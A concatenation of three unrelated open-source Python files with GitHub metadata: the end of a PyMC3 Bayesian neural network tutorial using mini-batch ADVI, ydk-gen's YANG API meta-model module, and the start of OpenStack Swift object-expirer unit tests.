ax.scatter(X_test[pred==1, 0], X_test[pred==1, 1], color='r')
cbar = plt.colorbar(contour, ax=ax)
_ = ax.set(xlim=(-3, 3), ylim=(-3, 3), xlabel='X', ylabel='Y');
cbar.ax.set_ylabel('Uncertainty (posterior predictive standard deviation)');
# We can see that very close to the decision boundary, our uncertainty as to which label to predict is highest. You can imagine that associating predictions with uncertainty is a critical property for many applications like health care. To further maximize accuracy, we might want to train the model primarily on samples from that high-uncertainty region.
# ## Mini-batch ADVI: Scaling data size
# So far, we have trained our model on all data at once. Obviously this won’t scale to something like ImageNet. Moreover, training on mini-batches of data (stochastic gradient descent) avoids local minima and can lead to faster convergence.
#
# Fortunately, ADVI can be run on mini-batches as well. It just requires some setting up:
# In[18]:
from six.moves import zip
# Set back to original data to retrain
ann_input.set_value(X_train)
ann_output.set_value(Y_train)
# Tensors and RV that will be using mini-batches
minibatch_tensors = [ann_input, ann_output]
minibatch_RVs = [out]
# Generator that returns mini-batches in each iteration
def create_minibatch(data):
rng = np.random.RandomState(0)
while True:
        # Return a random mini-batch of 50 samples on each iteration
ixs = rng.randint(len(data), size=50)
yield data[ixs]
minibatches = zip(
create_minibatch(X_train),
create_minibatch(Y_train),
)
total_size = len(Y_train)
# While the above might look a bit daunting, I really like the design. In particular, the fact that you define a generator allows for great flexibility. In principle, we could just pull mini-batches from a database and not have to keep all the data in RAM, as sketched below.
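# To illustrate that flexibility (a sketch, not part of the original post): a
# generator that pulls each mini-batch from a SQLite table instead of holding the
# full training set in memory. The database path, table name, and column names
# (x1, x2, y) are hypothetical. The actual run below keeps using the in-memory
# generator defined above.
def create_minibatch_from_db(db_path, table='training_data', batch_size=50):
    import sqlite3
    conn = sqlite3.connect(db_path)
    query = 'SELECT x1, x2, y FROM %s ORDER BY RANDOM() LIMIT %d' % (table, batch_size)
    while True:
        batch = np.asarray(conn.execute(query).fetchall(), dtype=floatX)
        yield batch[:, :2], batch[:, 2]  # (inputs, targets) for one mini-batch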
#
# Let's pass those to advi_minibatch():
# In[19]:
get_ipython().run_cell_magic('time', '', '\nwith neural_network:\n # Run advi_minibatch\n v_params = pm.variational.advi_minibatch(\n n=50000, minibatch_tensors=minibatch_tensors,\n minibatch_RVs=minibatch_RVs, minibatches=minibatches,\n total_size=total_size, learning_rate=1e-2, epsilon=1.0\n )')
# In[20]:
with neural_network:
trace = pm.variational.sample_vp(v_params, draws=5000)
# In[21]:
plt.plot(v_params.elbo_vals)
plt.ylabel('ELBO')
plt.xlabel('iteration')
sns.despine()
# As you can see, mini-batch ADVI’s running time is much lower. It also seems to converge faster.
#
# For fun, we can also look at the trace. The point is that we also get uncertainty of our Neural Network weights.
# In[22]:
pm.traceplot(trace);
# ## Summary
# Hopefully this blog post demonstrated a very powerful new inference algorithm available in PyMC3: ADVI. I also think bridging the gap between Probabilistic Programming and Deep Learning can open up many new avenues for innovation in this space, as discussed above. Specifically, a hierarchical neural network sounds pretty bad-ass. These are really exciting times.
# In[ ]:
| {
"content_hash": "05d9f72da8e78c938cdc078481811959",
"timestamp": "",
"source": "github",
"line_count": 276,
"max_line_length": 367,
"avg_line_length": 37.75,
"alnum_prop": 0.6990114214415971,
"repo_name": "balarsen/pymc_learning",
"id": "ae7bbae0260554fa6379ee5151fc387029011dea",
"size": "10717",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "BayesianNetwork/Neural Networks in PyMC3.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "3143936"
},
{
"name": "Jupyter Notebook",
"bytes": "132018941"
},
{
"name": "Python",
"bytes": "26029"
}
],
"symlink_target": ""
} |
"""
api_model.py
The meta-model of the generated API.
Translation process converts the YANG model to classes defined in this module.
"""
from __future__ import absolute_import
from pyang.statements import TypeStatement
from pyang.types import UnionTypeSpec, PathTypeSpec
class Element(object):
"""
The Element class.
This is the super class of all modelled elements in the API.
:attribute:: owned_elements
list of `Element` owned by this element
:attribute:: owner
The owner of this `Element`.
:attribute:: comment
The comments associated with this element.
"""
def __init__(self):
self.owned_elements = []
self._owner = None
self.comment = None
self.revision = None
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
self._owner = owner
class Deviation(Element):
def __init__(self, iskeyword):
Element.__init__(self)
self.name = None
self._stmt = None
self.d_type = None
self.d_target = None
self.iskeyword = iskeyword
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self.name = stmt.arg
def qn(self):
names = []
stmt = self.d_target
while stmt.parent:
if stmt.keyword not in ('container', 'list', 'rpc'):
names.append(self.convert_prop_name(stmt))
else:
names.append(self.convert_owner_name(stmt))
stmt = stmt.parent
return '.'.join(reversed(names))
def convert_prop_name(self, stmt):
name = snake_case(stmt.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name.startswith('_'):
name = '%s%s' % ('y', name)
return name
def convert_owner_name(self, stmt):
name = escape_name(stmt.arg)
if stmt.keyword == 'grouping':
name = '%sGrouping' % camel_case(name)
elif stmt.keyword == 'identity':
name = '%sIdentity' % camel_case(name)
elif stmt.keyword == 'rpc':
name = camel_case(name) + 'Rpc'
else:
name = camel_case(name)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name.startswith('_'):
name = '%s%s' % ('Y', name)
return name
def get_package(self):
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
if hasattr(self.owner, 'get_package'):
return self.owner.get_package()
class NamedElement(Element):
"""
An abstract element that may have a name
The name is used for identification of the named element
within the namespace that is defined or accessible
:attribute:: name
The name of the Element
"""
def __init__(self):
""" The name of the named element """
super().__init__()
self.name = None
def get_py_mod_name(self):
"""
Get the python module name that contains this
NamedElement.
"""
pkg = get_top_pkg(self)
if not pkg.bundle_name:
py_mod_name = 'ydk.models.%s' % pkg.name
else:
py_mod_name = 'ydk.models.%s.%s' % (pkg.bundle_name, pkg.name)
return py_mod_name
def get_cpp_header_name(self):
"""
Get the c++ header that contains this
NamedElement.
"""
pkg = get_top_pkg(self)
if pkg.curr_bundle_name == pkg.bundle_name:
cpp_header_name = '%s.hpp' % pkg.name
else:
cpp_header_name = 'ydk_%s/%s.hpp' % (pkg.bundle_name, pkg.name)
return cpp_header_name
def get_meta_py_mod_name(self):
"""
Get the python meta module that contains the meta model
information about this NamedElement.
"""
pkg = get_top_pkg(self)
if not pkg.bundle_name:
meta_py_mod_name = 'ydk.models._meta'
else:
meta_py_mod_name = 'ydk.models.%s._meta' % pkg.bundle_name
return meta_py_mod_name
def fqn(self):
''' get the Fully Qualified Name '''
names = []
element = self
while element is not None:
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '.'.join(reversed(names))
def qn(self):
''' get the qualified name , name sans
package name '''
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '.'.join(reversed(names))
def qualified_cpp_name(self):
''' get the C++ qualified name , name sans
package name '''
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return '::'.join(reversed(names))
def fully_qualified_cpp_name(self):
''' get the C++ qualified name '''
pkg = get_top_pkg(self)
names = []
element = self
while element is not None:
if isinstance(element, Deviation):
element = element.owner
names.append(element.name)
element = element.owner
return pkg.bundle_name + '::' + '::'.join(reversed(names))
def go_name(self):
stmt = self.stmt
if stmt is None:
raise Exception('element is not yet defined')
if hasattr(self, 'goName'):
return self.goName
stmt_name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
name = camel_case(stmt_name)
if stmt_name[-1] == '_':
name = '%s_' % name
if self.iskeyword(name):
name = 'Y%s' % name
self.goName = name
return self.goName
def qualified_go_name(self):
''' get the Go qualified name (sans package name) '''
if self.stmt.keyword == 'identity':
return self.go_name()
if hasattr(self, 'qualifiedGoName'):
return self.qualifiedGoName
names = []
element = self
while element is not None and not isinstance(element, Package):
if isinstance(element, Deviation):
element = element.owner
names.append(element.go_name())
element = element.owner
self.qualifiedGoName = '_'.join(reversed(names))
return self.qualifiedGoName
class Package(NamedElement):
"""
Represents a Package in the API
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._sub_name = ''
self._bundle_name = ''
self._curr_bundle_name = ''
self._augments_other = False
self.identity_subclasses = {}
self.iskeyword = iskeyword
self.version = '1'
def qn(self):
""" Return the qualified name """
return self.name
@property
def is_deviation(self):
return hasattr(self.stmt, 'is_deviation_module')
@property
def is_augment(self):
return hasattr(self.stmt, 'is_augmented_module')
@property
def augments_other(self):
return self._augments_other
@augments_other.setter
def augments_other(self, augments_other):
self._augments_other = augments_other
@property
def bundle_name(self):
return self._bundle_name
@bundle_name.setter
def bundle_name(self, bundle_name):
self._bundle_name = bundle_name
@property
def curr_bundle_name(self):
return self._curr_bundle_name
@curr_bundle_name.setter
def curr_bundle_name(self, curr_bundle_name):
self._curr_bundle_name = curr_bundle_name
@property
def sub_name(self):
if self.bundle_name != '':
sub = self.bundle_name
else:
py_mod_name = self.get_py_mod_name()
sub = py_mod_name[len('ydk.models.'): py_mod_name.rfind('.')]
return sub
@property
def stmt(self):
""" Return the `pyang.statements.Statement` associated
with this package. This is usually a module statement.
"""
return self._stmt
@stmt.setter
def stmt(self, stmt):
name = stmt.arg.replace('-', '_')
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name[0] == '_':
name = 'y%s' % name
self.name = name
revision = stmt.search_one('revision')
if revision is not None:
self.revision = revision.arg
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
if hasattr(stmt, 'i_version'):
self.version = stmt.i_version
def imported_types(self):
"""
Returns a list of all types imported by elements in
this package.
"""
imported_types = []
for clazz in [c for c in self.owned_elements if isinstance(c, Class)]:
imported_types.extend(clazz.imported_types())
return imported_types
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.name == other.name
else:
return False
__hash__ = NamedElement.__hash__
class DataType(NamedElement):
"""
Represents a DataType
"""
def __init__(self):
super().__init__()
class Class(NamedElement):
"""
Represents a Class in the api.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._extends = []
self._module = None
self.iskeyword = iskeyword
@property
def extends(self):
""" Returns the immediate super classes of this class. """
if self.is_identity():
base = []
base_stmts = self.stmt.search('base')
for base_stmt in base_stmts:
if hasattr(base_stmt, 'i_identity'):
base_identity = base_stmt.i_identity
if hasattr(base_identity, 'i_class'):
base.append(base_identity.i_class)
return base
else:
return self._extends
def is_identity(self):
""" Returns True if this is a class for a YANG identity. """
return self._stmt.keyword == 'identity'
def is_grouping(self):
""" Returns True if this is a class for a YANG grouping. """
return self._stmt.keyword == 'grouping'
def is_rpc(self):
return self._stmt.keyword == 'rpc'
def all_owned_elements(self):
""" Returns all the owned_element of this class and its super classes."""
all_owned_elements = []
for super_class in self.extends:
all_owned_elements.extend(super_class.all_owned_elements())
all_owned_elements.extend(self.owned_elements)
return all_owned_elements
def properties(self):
""" Returns the properties defined by this class. """
return get_properties(self.owned_elements)
def get_package(self):
""" Returns the Package that contains this Class. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
if hasattr(self.owner, 'get_package'):
return self.owner.get_package()
def imported_types(self):
""" Returns all types that are referenced in this Class that are not
from the same package as this Class."""
imported_types = []
package = self.get_package()
# look at the super classes
for super_class in self.extends:
if super_class.get_package() != package:
if super_class not in imported_types:
imported_types.append(super_class)
for p in self.properties():
prop_types = [p.property_type]
if isinstance(p.property_type, UnionTypeSpec):
for child_type_stmt in p.property_type.types:
prop_types.extend(_get_union_types(child_type_stmt))
for prop_type in prop_types:
if isinstance(prop_type, Class) or isinstance(prop_type, Enum) or isinstance(prop_type, Bits):
if prop_type.get_package() != package:
if prop_type not in imported_types:
imported_types.append(prop_type)
# do this for nested classes too
for nested_class in [clazz for clazz in self.owned_elements if isinstance(clazz, Class)]:
imported_types.extend(
[c for c in nested_class.imported_types() if c not in imported_types])
return imported_types
def get_dependent_siblings(self):
''' This will return all types that are referenced by this Class
or nested Classes that are at the same level as this type within the package and are
used as super types .
This is useful to determine which type needs to be printed
before declaring this type in languages that do not support
forward referencing like Python '''
classes_at_same_level = []
classes_at_same_level.extend(
[c for c in self.owner.owned_elements if isinstance(c, Class) and c is not self])
dependent_siblings = []
package = self.get_package()
def _walk_supers(clazz):
for super_class in clazz.extends:
if super_class.get_package() == package and super_class in classes_at_same_level:
if super_class not in dependent_siblings:
dependent_siblings.append(super_class)
_walk_supers(super_class)
def _walk_nested_classes(clazz):
for nested_class in [c for c in clazz.owned_elements if isinstance(c, Class)]:
_walk_supers(nested_class)
_walk_nested_classes(nested_class)
_walk_supers(self)
_walk_nested_classes(self)
return dependent_siblings
def is_config(self):
"""
Returns True if an instance of this Class represents config data.
"""
if hasattr(self.stmt, 'i_config'):
return self.stmt.i_config
elif isinstance(self.owner, Class):
            return self.owner.is_config()
else:
return True
@property
def stmt(self):
"""
Returns the `pyang.statements.Statement` instance associated with this Class.
"""
return self._stmt
@property
def module(self):
"""
Returns the module `pyang.statements.Statement` that this Class was derived from.
"""
return self._module
@stmt.setter
def stmt(self, stmt):
name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
name = camel_case(name)
if self.iskeyword(name):
name = '_%s' % name
self.name = name
if self.name.startswith('_'):
self.name = '%s%s' % ('Y', name)
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
if stmt.keyword == 'module':
self._module = stmt
else:
self._module = stmt.i_module
def get_key_props(self):
""" Returns a list of the properties of this class that are keys
of a YANG list. """
key_props = []
if self.stmt.keyword == 'list':
if hasattr(self.stmt, 'i_key'):
key_stmts = self.stmt.i_key
# do not use #properties here
for prop in [p for p in self.owned_elements if isinstance(p, Property)]:
if prop.stmt in key_stmts:
key_props.append(prop)
return key_props
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.fqn() == other.fqn()
else:
return False
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, owner):
self._owner = owner
self.name = _modify_nested_container_with_same_name(self)
def set_owner(self, owner, language):
self._owner = owner
if language == 'cpp':
self.name = _modify_nested_container_with_same_name(self)
__hash__ = NamedElement.__hash__
class AnyXml(NamedElement):
"""
Represents an AnyXml element.
"""
def __init__(self):
super().__init__()
self._stmt = None
@property
def stmt(self):
""" Returns the `pyang.statements.Statement` instance associated with this AnyXml instance."""
return self._stmt
@stmt.setter
def stmt(self, stmt):
self.name = 'string'
self._stmt = stmt
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
def properties(self):
return get_properties(self.owned_elements)
class Bits(DataType):
"""
A DataType representing the bits type in YANG.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self._dictionary = None
self._pos_map = None
self.iskeyword = iskeyword
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.fqn() == other.fqn()
else:
return False
def get_package(self):
""" Returns the Package for this DataType. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
return self.owner.get_package()
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self._dictionary = {}
self._pos_map = {}
# the name of the enumeration is derived either from the typedef
# or the leaf under which it is defined
leaf_or_typedef = stmt
while leaf_or_typedef.parent and leaf_or_typedef.keyword not in ['leaf', 'leaf-list', 'typedef']:
leaf_or_typedef = leaf_or_typedef.parent
name = '%s' % camel_case(leaf_or_typedef.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
            name = '%s_' % name
self.name = name
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
else:
desc = leaf_or_typedef.search_one('description')
if desc is not None:
self.comment = desc.arg
for bit_stmt in stmt.search('bit'):
self._dictionary[bit_stmt.arg] = False
pos_stmt = bit_stmt.search_one('position')
if pos_stmt is not None:
self._pos_map[bit_stmt.arg] = pos_stmt.arg
__hash__ = DataType.__hash__
class Property(NamedElement):
""" Represents an attribute or reference of a Class.
"""
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self.is_static = False
self.featuring_classifiers = []
self.read_only = False
self.is_many = False
self.id = False
self._property_type = None
self.max_elements = None
self.min_elements = None
self.iskeyword = iskeyword
def is_key(self):
""" Returns True if this property represents a key of a YANG list."""
if isinstance(self.owner, Class):
return self in self.owner.get_key_props()
return False
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
# name = snake_case(stmt.arg)
name = snake_case(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else stmt.arg)
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
self.name = name
if self.name.startswith('_'):
self.name = '%s%s' % ('y', name)
if stmt.keyword in ['leaf-list', 'list']:
self.is_many = True
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
max_elem_stmt = stmt.search_one('max-elements')
min_elem_stmt = stmt.search_one('min-elements')
if max_elem_stmt:
self.max_elements = max_elem_stmt.arg
if min_elem_stmt:
self.min_elements = min_elem_stmt.arg
@property
def property_type(self):
""" Returns the type of this property. """
if self._property_type is not None:
return self._property_type
if self._stmt is None:
return None
if self._stmt.keyword in ['leaf', 'leaf-list']:
type_stmt = self._stmt.search_one('type')
return type_stmt.i_type_spec
else:
return None
@property_type.setter
def property_type(self, property_type):
self._property_type = property_type
class Enum(DataType):
""" Represents an enumeration. """
def __init__(self, iskeyword, typedef_stmt=None):
super().__init__()
self._stmt = None
self.literals = []
self.iskeyword = iskeyword
while typedef_stmt and typedef_stmt.keyword != 'typedef' and typedef_stmt.parent:
typedef_stmt = typedef_stmt.parent
self.typedef_stmt = typedef_stmt
def get_package(self):
""" Returns the Package that this enum is found in. """
if self.owner is None:
return None
if isinstance(self.owner, Package):
return self.owner
else:
return self.owner.get_package()
def go_name(self):
stmt = self.stmt
if stmt is None:
raise Exception('element is not yet defined')
if hasattr(self, 'goName'):
return self.goName
while stmt.parent and stmt.keyword not in ['leaf', 'leaf-list', 'typedef']:
stmt = stmt.parent
name = stmt.arg
if self.typedef_stmt:
name = self.typedef_stmt.arg
name = escape_name(stmt.unclashed_arg if hasattr(stmt, 'unclashed_arg') else name)
name = camel_case(name)
if self.iskeyword(name):
name = '%s%s' % ('Y', name)
suffix = '_' if self.name[-1] == '_' else ''
name = '%s%s' % (name, suffix)
self.goName = name
return self.goName
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
# the name of the numeration is derived either from the typedef
# or the leaf under which it is defined
leaf_or_typedef = stmt
while leaf_or_typedef.parent and leaf_or_typedef.keyword not in ['leaf', 'leaf-list', 'typedef']:
leaf_or_typedef = leaf_or_typedef.parent
name = leaf_or_typedef.arg
if self.typedef_stmt:
name = self.typedef_stmt.arg
name = camel_case(escape_name(name))
if self.iskeyword(name) or self.iskeyword(name.lower()):
name = '%s_' % name
if name[0] == '_':
name = 'Y%s' % name
self.name = name
desc = None
if self.typedef_stmt:
desc = self.typedef_stmt.search_one('description')
if desc is None:
desc = stmt.search_one('description')
if desc is None:
            desc = leaf_or_typedef.search_one('description')
if desc:
self.comment = desc.arg
else:
self.comment = ""
for enum_stmt in stmt.search('enum'):
literal = EnumLiteral(self.iskeyword)
literal.stmt = enum_stmt
self.literals.append(literal)
class EnumLiteral(NamedElement):
""" Represents an enumeration literal. """
def __init__(self, iskeyword):
super().__init__()
self._stmt = None
self.value = None
self.iskeyword = iskeyword
@property
def stmt(self):
return self._stmt
@stmt.setter
def stmt(self, stmt):
self._stmt = stmt
self.name = stmt.arg.replace('-', '_')
self.name = self.name.replace('+', '__PLUS__')
self.name = self.name.replace('/', '__FWD_SLASH__')
self.name = self.name.replace('\\', '__BACK_SLASH__')
self.name = self.name.replace('.', '__DOT__')
self.name = self.name.replace('*', '__STAR__')
self.name = self.name.replace('$', '__DOLLAR__')
self.name = self.name.replace('@', '__AT__')
self.name = self.name.replace('#', '__POUND__')
self.name = self.name.replace('^', '__CARET__')
self.name = self.name.replace('&', '__AMPERSAND__')
self.name = self.name.replace('(', '__LPAREN__')
self.name = self.name.replace(')', '__RPAREN__')
self.name = self.name.replace('=', '__EQUALS__')
self.name = self.name.replace('{', '__LCURLY__')
self.name = self.name.replace('}', '__RCURLY__')
self.name = self.name.replace("'", '__SQUOTE__')
self.name = self.name.replace('"', '__DQUOTE__')
self.name = self.name.replace('<', '__GREATER_THAN__')
self.name = self.name.replace('>', '__LESS_THAN__')
self.name = self.name.replace(',', '__COMMA__')
self.name = self.name.replace(':', '__COLON__')
self.name = self.name.replace('?', '__QUESTION__')
self.name = self.name.replace('!', '__BANG__')
self.name = self.name.replace(';', '__SEMICOLON__')
self.name = self.name.replace(' ', '_')
if self.iskeyword(self.name):
self.name += '_'
if self.name[0:1].isdigit():
self.name = 'Y_%s' % self.name
if self.name[0] == '_':
self.name = 'Y%s' % self.name
self.value = stmt.i_value
desc = stmt.search_one('description')
if desc is not None:
self.comment = desc.arg
def get_top_pkg(pkg):
"""
Get top level Package instance of current NamedElement instance.
"""
while pkg is not None and not isinstance(pkg, Package):
pkg = pkg.owner
return pkg
def get_properties(owned_elements):
""" get all properties from the owned_elements. """
props = []
all_props = []
all_props.extend([p for p in owned_elements if isinstance(p, Property)])
# first get the key properties
key_props = [p for p in all_props if p.is_key()]
props.extend(key_props)
non_key_props = [p for p in all_props if not p.is_key()]
props.extend(non_key_props)
return props
def _modify_nested_container_with_same_name(named_element):
if named_element.owner.name.rstrip('_') == named_element.name:
return '%s_' % named_element.owner.name
else:
return named_element.name
def snake_case(input_text):
s = input_text.replace('-', '_')
s = s.replace('.', '_')
return s.lower()
def get_property_name(element, iskeyword):
name = snake_case(element.stmt.unclashed_arg if hasattr(element.stmt, 'unclashed_arg') else element.stmt.arg)
if iskeyword(name) or iskeyword(name.lower()) or (
element.owner is not None and element.stmt.arg.lower() == element.owner.stmt.arg.lower()):
name = '%s_' % name
return name
# capitalized input will not be affected
def camel_case(input_text):
def _capitalize(s):
if len(s) == 0 or s.startswith(s[0].upper()):
return s
ret = s[0].upper()
if len(s) > 1:
ret = '%s%s' % (ret, s[1:])
return ret
result = ''.join([_capitalize(word) for word in input_text.split('-')])
result = ''.join([_capitalize(word) for word in result.split('_')])
if input_text.startswith('_'):
result = '_' + result
return result
def camel_snake(input_text):
return '_'.join([word.title() for word in input_text.split('-')])
def escape_name(name):
name = name.replace('+', '__PLUS__')
name = name.replace('/', '__FWD_SLASH__')
name = name.replace('\\', '__BACK_SLASH__')
name = name.replace('.', '__DOT__')
name = name.replace('*', '__STAR__')
name = name.replace('$', '__DOLLAR__')
name = name.replace('@', '__AT__')
name = name.replace('#', '__POUND__')
name = name.replace('^', '__CARET__')
name = name.replace('&', '__AMPERSAND__')
name = name.replace('(', '__LPAREN__')
name = name.replace(')', '__RPAREN__')
name = name.replace('=', '__EQUALS__')
name = name.replace('{', '__LCURLY__')
name = name.replace('}', '__RCURLY__')
name = name.replace("'", '__SQUOTE__')
name = name.replace('"', '__DQUOTE__')
name = name.replace('<', '__GREATER_THAN__')
name = name.replace('>', '__LESS_THAN__')
name = name.replace(',', '__COMMA__')
name = name.replace(':', '__COLON__')
name = name.replace('?', '__QUESTION__')
name = name.replace('!', '__BANG__')
name = name.replace(';', '__SEMICOLON__')
return name
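# Illustrative examples (not part of the original module) of the naming helpers
# above, applied to typical YANG identifiers:
#
#   snake_case('interface-name')  -> 'interface_name'
#   camel_case('interface-name')  -> 'InterfaceName'
#   camel_snake('ipv4-address')   -> 'Ipv4_Address'
#   escape_name('rx/tx-rate')     -> 'rx__FWD_SLASH__tx-rate'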
def _get_union_types(type_stmt):
from .builder import TypesExtractor
prop_type = TypesExtractor().get_property_type(type_stmt)
if isinstance(prop_type, TypeStatement):
prop_type = prop_type.i_type_spec
prop_type_specs = []
if isinstance(prop_type, UnionTypeSpec):
for child_type_stmt in prop_type.types:
prop_type_specs.extend(_get_union_types(child_type_stmt))
else:
prop_type_specs.append(prop_type)
return prop_type_specs
| {
"content_hash": "3e89b4b8c25fd841d2bbec271b2a03ac",
"timestamp": "",
"source": "github",
"line_count": 990,
"max_line_length": 113,
"avg_line_length": 30.830303030303032,
"alnum_prop": 0.5555664766398009,
"repo_name": "CiscoDevNet/ydk-gen",
"id": "6677891749f668d2eb0ec5edd8850630cccc5a6a",
"size": "31563",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ydkgen/api_model.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "21945"
},
{
"name": "C",
"bytes": "15875"
},
{
"name": "C++",
"bytes": "3529963"
},
{
"name": "CMake",
"bytes": "120070"
},
{
"name": "CSS",
"bytes": "134"
},
{
"name": "Dockerfile",
"bytes": "770"
},
{
"name": "Go",
"bytes": "566728"
},
{
"name": "Makefile",
"bytes": "960022"
},
{
"name": "Python",
"bytes": "1052712"
},
{
"name": "Ruby",
"bytes": "4023"
},
{
"name": "Shell",
"bytes": "153786"
}
],
"symlink_target": ""
} |
import urllib
from time import time
from unittest import main, TestCase
from test.unit import FakeLogger
from copy import deepcopy
import mock
from swift.common import internal_client
from swift.obj import expirer
def not_random():
return 0.5
last_not_sleep = 0
def not_sleep(seconds):
global last_not_sleep
last_not_sleep = seconds
class TestObjectExpirer(TestCase):
maxDiff = None
def setUp(self):
global not_sleep
self.old_loadapp = internal_client.loadapp
self.old_sleep = internal_client.sleep
internal_client.loadapp = lambda x: None
internal_client.sleep = not_sleep
    def tearDown(self):
        internal_client.sleep = self.old_sleep
        internal_client.loadapp = self.old_loadapp
def test_get_process_values_from_kwargs(self):
x = expirer.ObjectExpirer({})
vals = {
'processes': 5,
'process': 1,
}
self.assertEqual((5, 1), x.get_process_values(vals))
def test_get_process_values_from_config(self):
vals = {
'processes': 5,
'process': 1,
}
x = expirer.ObjectExpirer(vals)
self.assertEqual((5, 1), x.get_process_values({}))
def test_get_process_values_negative_process(self):
vals = {
'processes': 5,
'process': -1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_negative_processes(self):
vals = {
'processes': -5,
'process': 1,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_get_process_values_process_greater_than_processes(self):
vals = {
'processes': 5,
'process': 7,
}
# from config
x = expirer.ObjectExpirer(vals)
self.assertRaises(ValueError, x.get_process_values, {})
# from kwargs
x = expirer.ObjectExpirer({})
self.assertRaises(ValueError, x.get_process_values, vals)
def test_init_concurrency_too_small(self):
conf = {
'concurrency': 0,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
conf = {
'concurrency': -1,
}
self.assertRaises(ValueError, expirer.ObjectExpirer, conf)
def test_process_based_concurrency(self):
class ObjectExpirer(expirer.ObjectExpirer):
def __init__(self, conf):
super(ObjectExpirer, self).__init__(conf)
self.processes = 3
self.deleted_objects = {}
def delete_object(self, actual_obj, timestamp, container, obj):
if container not in self.deleted_objects:
self.deleted_objects[container] = set()
self.deleted_objects[container].add(obj)
class InternalClient(object):
def __init__(self, containers):
self.containers = containers
def get_account_info(self, *a, **kw):
return len(self.containers.keys()), \
sum([len(self.containers[x]) for x in self.containers])
def iter_containers(self, *a, **kw):
return [{'name': x} for x in self.containers.keys()]
def iter_objects(self, account, container):
return [{'name': x} for x in self.containers[container]]
def delete_container(*a, **kw):
pass
containers = {
0: set('1-one 2-two 3-three'.split()),
1: set('2-two 3-three 4-four'.split()),
2: set('5-five 6-six'.split()),
3: set('7-seven'.split()),
}
x = ObjectExpirer({})
x.swift = InternalClient(containers)
deleted_objects = {}
for i in xrange(0, 3):
x.process = i
x.run_once()
self.assertNotEqual(deleted_objects, x.deleted_objects)
deleted_objects = deepcopy(x.deleted_objects)
self.assertEqual(containers, deleted_objects)
def test_delete_object(self):
class InternalClient(object):
def __init__(self, test, account, container, obj):
self.test = test
self.account = account
self.container = container
self.obj = obj
self.delete_object_called = False
def delete_object(self, account, container, obj):
self.test.assertEqual(self.account, account)
self.test.assertEqual(self.container, container)
self.test.assertEqual(self.obj, obj)
self.delete_object_called = True
class DeleteActualObject(object):
def __init__(self, test, actual_obj, timestamp):
self.test = test
self.actual_obj = actual_obj
self.timestamp = timestamp
self.called = False
def __call__(self, actual_obj, timestamp):
self.test.assertEqual(self.actual_obj, actual_obj)
self.test.assertEqual(self.timestamp, timestamp)
self.called = True
container = 'container'
obj = 'obj'
actual_obj = 'actual_obj'
timestamp = 'timestamp'
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.swift = \
InternalClient(self, x.expiring_objects_account, container, obj)
x.delete_actual_object = \
DeleteActualObject(self, actual_obj, timestamp)
x.delete_object(actual_obj, timestamp, container, obj)
self.assertTrue(x.swift.delete_object_called)
self.assertTrue(x.delete_actual_object.called)
def test_report(self):
x = expirer.ObjectExpirer({})
x.logger = FakeLogger()
x.report()
self.assertEqual(x.logger.log_dict['info'], [])
x.logger._clear()
x.report(final=True)
self.assertTrue('completed' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
x.logger._clear()
x.report_last_time = time() - x.report_interval
x.report()
self.assertTrue('completed' not in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
self.assertTrue('so far' in x.logger.log_dict['info'][-1][0][0],
x.logger.log_dict['info'])
